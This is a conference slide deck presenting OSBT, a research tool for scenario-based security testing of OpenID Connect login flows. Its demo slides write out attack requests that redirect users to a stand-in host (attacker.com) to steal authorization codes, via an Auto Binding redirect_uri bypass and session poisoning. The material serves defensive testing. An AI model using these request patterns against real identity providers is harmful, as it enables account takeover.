OSBT: OpenID Connect Scenario-Based Tester Junki Yuasa Nara Institute of Science and Technology Laboratory for Cyber Resilience 2023/11/08 CODE BLUE 2023 BlueBox Edition

2 Junki Yuasa (湯浅 潤樹) Who am I ? l Nara Institute of Science and Technology l Student (M2) l Research on ID Federation Security l OAuth, OpenID Connect l SECCON Beginners CTF Writer X : @melonattacker

3 Social login to reduce the burden of account management Spread of social login Normal Login Web app A Web app B Web app C Cred Cred Cred Cred Burden increace Burden decreace Social Login Web app A Web app B Web app C

4 OIDC is a protocol for social login OpenID Connect（OIDC） User Relying Party (RP) ID Provider (IdP) 2. ID Token Leave user authentication to an external service (IdP) 1. Authentication Token containing user attribute information

5 OIDC is based on the OAuth2.0 authorization protocol OpenID Connect（OIDC） Access Token Token that allows access to user resources Can also issue tokens that allow access to user resources User Relying Party (RP) ID Provider (IdP)

6 OIDC Flow (Authorization code flow) RP IdP User Auth start

7 OIDC Flow (Authorization code flow) Authentication Request GET /authorize ?response_type=code &scope=openid profile email &client_id=dkn9nE9…MPuifABrH &state=af0ifjsldkj &redirect_uri=https://rp.example.com/cb RP IdP User

8 OIDC Flow (Authorization code flow) GET /authorize ?response_type=code &scope=openid profile email &client_id=dkn9nE9…MPuifABrH &state=af0ifjsldkj &redirect_uri=https://rp.example.com/cb URL to redirect RP IdP User Authentication Request

9 OIDC Flow (Authorization code flow) Submit credential and consent RP IdP User

10 OIDC Flow (Authorization code flow) Return authorization code 302 Found Location: https://rp.example.com/cb ?code=SplxlOBeZQQYbYS6WxSbIA &state=af0ifjsldkj RP IdP User

11 OIDC Flow (Authorization code flow) 302 Found Location: https://rp.example.com/cb ?code=SplxlOBeZQQYbYS6WxSbIA &state=af0ifjsldkj URL to redirect RP IdP User Return authorization code

12 OIDC Flow (Authorization code flow) 302 Found Location: https://rp.example.com/cb ?code=SplxlOBeZQQYbYS6WxSbIA &state=af0ifjsldkj Authorization code RP IdP User Return authorization code

13 OIDC Flow (Authorization code flow) Token request POST /token Host: idp.example.com Content-Type: application/x-www-from-urlencoded Authorization: Basic czZCaGRSa3…mQmF0M2JW grant_type=authorization_code &code=SplxlOBeZQQYbYS6WxSbIA &redirect_uri=https://rp.example.com/cb RP IdP User

14 OIDC Flow (Authorization code flow) POST /token Host: idp.example.com Content-Type: application/x-www-from-urlencoded Authorization: Basic czZCaGRSa3…mQmF0M2JW grant_type=authorization_code &code=SplxlOBeZQQYbYS6WxSbIA &redirect_uri=https://rp.example.com/cb Authorization code RP IdP User Token request

15 OIDC Flow (Authorization code flow) Token request POST /token Host: idp.example.com Content-Type: application/x-www-from-urlencoded Authorization: Basic czZCaGRSa3…mQmF0M2JW grant_type=authorization_code &code=SplxlOBeZQQYbYS6WxSbIA &redirect_uri=https://rp.example.com/cb URL to redirect RP IdP User

16 OIDC Flow (Authorization code flow) Token response { "access_token": "SlAV32hkKG", "token_type": "Bearer", "refresh_token": "8xLOxBtZp8", "expires_in": 3600, "id_token": "eyJhb…KMzqg" } RP IdP User

17 OIDC Flow (Authorization code flow) { "access_token": "SlAV32hkKG", "token_type": "Bearer", "refresh_token": "8xLOxBtZp8", "expires_in": 3600, "id_token": "eyJhb…KMzqg" } RP IdP User Token response Access Token Used by the RP to acquire user resources

18 OIDC Flow (Authorization code flow) { "access_token": "SlAV32hkKG", "token_type": "Bearer", "refresh_token": "8xLOxBtZp8", "expires_in": 3600, "id_token": "eyJhb…KMzqg" } RP IdP User Token response ID Token Used for user authentication in the RP

19 Vulnerability testing challenges for OIDC Vuln Vuln Vuln Vuln l Multiple entities interact l Potential vulnerabilities exist throughout the auth flow l Checking behavior during the auth flow operations is essential l Customizing scenarios flexibly is essential to address various vulnerabilities Vuln User RP IdP

20 Vulnerability testing challenges for OIDC Vuln Vuln Vuln Vuln l Multiple entities interact l Potential vulnerabilities exist throughout the auth flow l Checking behavior during the auth flow operations is essential l Customizing scenarios flexibly is essential to address various vulnerabilities Vuln User RP IdP

21 Vulnerability testing challenges for OIDC Vuln Vuln Vuln Vuln l Multiple entities interact l Potential vulnerabilities exist throughout the auth flow l Checking behavior during the auth flow operations is essential l Customizing scenarios flexibly is essential to address various vulnerabilities Vuln Research Objective : Create a test tool that allows for highly customizable scenarios User RP IdP

22 Can address Spec-Based Vulns and Implementation-Based Vulns l Specification-Based vulnerability l Resulting from improper implementation of the specification l Indicated in specification’s Security Consideration l Implementation-Based vulnerability l Resulting from implementation outside of specification l Vulnerabilities registered as CVE, etc. Test Issue 1 : Test coverage

23 Implementation-Based vulnerability l Vulnerabilities due to implementation method l Resulting from implementation methods such as unique protocol extensions and session management l Vulnerabilities due to using server/database l Resulting from improper use of the server, database, etc l Vulnerabilities due to using language/framework l Resulting from improper use of the language and framework l Vulnerabilities due to chained exploitation of RP/IdP l Resulting from situation where chained exploitation of RP/IdP is possible Resulting from implementation outside of specification

24 Implementation-Based vulnerability (example) l Vulnerabilities due to implementation method l Session poisoning resulting from improper session management l Vulnerabilities due to using server/database l LDAP injection resulting from improper handling of LDAP query l Vulnerabilities due to using language/framework l Incomplete redirect_uri validation resulting from improper use of Auto Binding l Vulnerabilities due to chained exploitation of RP/IdP l Valid authorization code theft by exploiting RP's XSS and IdP's authorization code consumption flaws Resulting from implementation outside of specification

25 Whether the requirements for customizability are met Test Issue 2 : Customizability of scenarios Requirement1 : Fixed scenario Operation A Operation B Operation C Requirement2 : Operations can be disabled Requirement3 : Order of operations can be changed Variable A Requirement4 : Variables within operations can be specified Customizability required for detecting implementation-based vulns Operation A Operation B Operation C Operation B Operation A Operation C Operation A Operation B Operation C

26 Manual testing is useful but difficult to reproduce Test Issue 3 : Reproducibility Simulate both victim and attacker operations OP 1 OP 2 OP 3 OP 1 OP 2 OP 3 Victim Attacker Manipulate multiple parameters in multiple requests

27 Three issues are not adequately resolved Existing test tools and manual verification [1] Zhou, Yuchen, and David Evans. "SSOScan: Automated testing of web applications for Single Sign-On vulnerabilities." 23rd {USENIX} Security Symposium ({USENIX} Security 14). 2014. [2] Mainka, Christian, et al. "SoK: single sign-on security—an evaluation of openID connect." 2017 IEEE European Symposium on Security and Privacy (EuroS&P). IEEE, 2017. Tool Test Coverage Customizability of scenarios Reproducibility SSOScan[1] △ Only spec-based vulns (5) △ Requirement 1 ◯ Automation PrOfESSOS[2] △ Only spec-based vulns (11) △ Requirement 1,2 ◯ Automation Manual Testing ◯ Spec-based vulns, impl-based vulns ◯ Requirement 1,2,3,4 △ Manual

28 OSBT: OpenID Connect Scenario-Based Tester Tool Test Coverage Customizability of scenarios Reproducibility OSBT[3] ◯ Spec-based vulns, implementation- based vulns ◯ Requirement 1,2,3,4 ◯ Automation Tool that allows you to programmatically write and execute test scenarios [3] OSBT, https://github.com/oidc-scenario-based-tester/osbt

29 Implementation-Based vulnerability can also be tested OSBT : Test coverage, Customizability of scenarios Scenario 1 Scenario 2 Scenario 3 Existing tools Test scenarios are built into the tool Implementation-Based vulns cannot be tested New Scenario OSBT Can create customizable scenarios Scenario Description Function Implementation-Based vulns can be tested

30 Reproduce operations equivalent to manual testing OSBT : Reproducibility OSBT Write procedure in code Reproducibility is ensured Manual Testing Procedure is complicated Difficult to ensure reproducibility

31 Test scenario description function l Browser operation function l Operations on the screen, expanding URLs, and acquiring page sources l HTTP request/response manipulation function l Data tampering, sending multiple parameters, interception, obtaining history l Attacker IdP operation function l Specifying returned ID tokens, IdP information, etc. l Attacker server operation function l Referring to logs to check the possibility of stealing authorization codes or tokens Developed based on scenario description requirements

32 Test scenario description function : Browser operation RP IdP User Attacker Expanding URLs Malicious URL Acquiring page sources Operation on the screen Addressing vulnerabilities that require phishing Automating browser operations during auth flow Used to judge test results

33 Test scenario description function : HTTP request/response manipulation RP IdP Interception User Proxy server Addressing vulnerabilities due to inadequate parameter validation. Obtaining history Used to judge test results Used to interrupt the authentication flow Data tampering Sending multiple params

34 Test scenario description function : Attacker IdP operation RP Attacker IdP User Specifying IdP information Addressing vulnerabilities due to inadequate IdP information validation Specifying token Addressing vulnerabilities due to inadequate token validation

35 Test scenario description function : Attacker server operation RP IdP User Attacker server Referring to logs token Authorization code Checking the possibility of stealing authorization codes or tokens

36 Architecture Tester (scenario) Attacker server Attacker IdP RP IdP Test target Proxy server

37 The flow of scenario execution A scenario to test for flaws in redirect_uri validation Setup Sending commands to tamper with the redirect_uri Execute the authentication flow Refer to the attacker server's log.

38 The flow of scenario execution Tester (scenario) Attacker server Attacker IdP RP IdP Test target Proxy server Data tampering Tamper with the value of redirect_uri to the attacker server's URL

39 The flow of scenario execution Tester (scenario) Attacker server Attacker IdP RP IdP Test target Proxy server Operation on the screen Entering creds during the execution of the authentication flow

40 The flow of scenario execution Tester (scenario) Attacker server Attacker IdP RP IdP Test target Proxy server Referring to logs Checking the possibility of stealing the authorization code

41 Implementation (OSBT[3]) Tester (scenario) Attacker server Attacker IdP RP IdP Test target Proxy server [3] OSBT, https://github.com/oidc-scenario-based-tester/osbt Vulns

42 DEMO : redirect_uri bypass via Auto Biding GET /authorize ?response_type=code &scope=openid profile email &client_id=dkn9nE9…MPuifABrH &state=af0ifjsldkj &redirect_uri=https://rp.example.com/cb Authentication Request IdP RP User Validate redirect_uri URL to redirect

43 Submit credential and consent RP IdP User DEMO : redirect_uri bypass via Auto Biding GET /consent ?response_type=code &scope=openid profile email &client_id=dkn9nE9…MPuifABrH &state=af0ifjsldkj &redirect_uri=https://rp.example.com/cb Don’t validate redirect_uri Query params inherited via Auto Binding

44 DEMO : redirect_uri bypass via Auto Biding (Attack Step) User Relying Party (RP) ID Provider (IdP) Attacker 1. Phishing url 2. Consent GET /consent … &redirect_uri= https://attacker.com 3. Redirect to redirect_uri https://attacker.com? code=Splxl…xSbIA Authorization code leaked!!

45 DEMO : redirect_uri session poisoning GET /authorize Cookie: session=kAKJnsier7EAR8jsK ?response_type=code &scope=openid profile email &client_id=dkn9nE9…MPuifABrH &state=af0ifjsldkj &redirect_uri=https://rp.example.com/cb Authentication Request IdP RP User Tie the params to the user’s sesison Session cookie

46 DEMO : redirect_uri session poisoning GET /authorize Cookie: session=kAKJnsier7EAR8jsK ?response_type=code &scope=openid profile email &client_id=attacker_client_id &state=af0ifjsldkj &redirect_uri=https://attacker.com Authentication Request IdP RP User Parameters tied to the session are updated Send this request at the same time Same Session cookie

47 DEMO : redirect_uri session poisoning (Attack Step) User Relying Party (RP) ID Provider (IdP) Attacker 1. Phishing url 3. Authentication request GET /authorize Cookie: session=kA..sK … &client_id=honest &redirect_uri= https://rp.example.com 2. Open web site

48 DEMO : redirect_uri session poisoning (Attack Step) User Relying Party (RP) ID Provider (IdP) Attacker 1. Phishing url 4. Authentication request GET /authorize Cookie: session=kA..sK … &client_id=attacker &redirect_uri= https://attacker.com 2. Open web site

49 DEMO : redirect_uri session poisoning (Attack Step) User Relying Party (RP) ID Provider (IdP) Attacker 1. Phishing url 2. Open web site 5. Consent POST /consent Cookie: session=kA..sK … consent=“Yes” 6. Redirect to redirect_uri https://attacker.com? code=Splxl…xSbIA Authorization code leaked!!

50 DEMO : Github Actions (CI) Run tests on github actions Test report is created on issue

51 l Challenge l Existing test tools lack scenario customizability l Unable to detect implementation-based vulnerabilities l Research Objective l Create a test tool that allows for highly customizable scenarios l OSBT l Enable the execution of scenarios created using the description function l DEMO l Can detects two implementation-based vulnerabilities l Available in Github Actions (CI) Summary

52 [1] Zhou, Yuchen, and David Evans. "SSOScan: Automated testing of web applications for Single Sign-On vulnerabilities." 23rd {USENIX} Security Symposium ({USENIX} Security 14). 2014. [2] Mainka, Christian, et al. "SoK: single sign-on security—an evaluation of openID connect." 2017 IEEE European Symposium on Security and Privacy (EuroS&P). IEEE, 2017. [3] OSBT, https://github.com/oidc-scenario-based-tester/osbt Image: https://flaticon.com/ References